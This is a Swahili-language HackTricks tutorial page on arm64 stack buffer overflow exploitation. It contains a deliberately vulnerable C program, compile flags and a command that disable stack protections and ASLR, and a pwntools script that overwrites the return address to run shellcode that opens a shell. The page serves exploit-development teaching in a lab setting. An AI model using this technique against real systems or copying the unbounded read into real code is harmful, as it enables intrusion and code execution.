Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Stack Shellcode - arm64

Support HackTricks

Pata utangulizi wa arm64 katika:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Tengeneza bila pie, canary na nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

Hakuna ASLR & Hakuna canary - Stack Overflow

Ili kuzuia ASLR tekeleza:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ili kupata kipimo cha bof angalia kiungo hiki.

Dhamira:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Jambo pekee "gumu" kupata hapa ingekuwa anwani katika stack ya kuita. Katika kesi yangu nilitengeneza exploit na anwani iliyopatikana kwa kutumia gdb, lakini kisha wakati wa ku exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).

Nilifungua core file iliyotengenezwa (gdb ./bog ./core) na kuangalia anwani halisi ya mwanzo wa shellcode.

Support HackTricks
PreviousStack ShellcodeNextStack Pivoting - EBP2Ret - EBP chaining

Last updated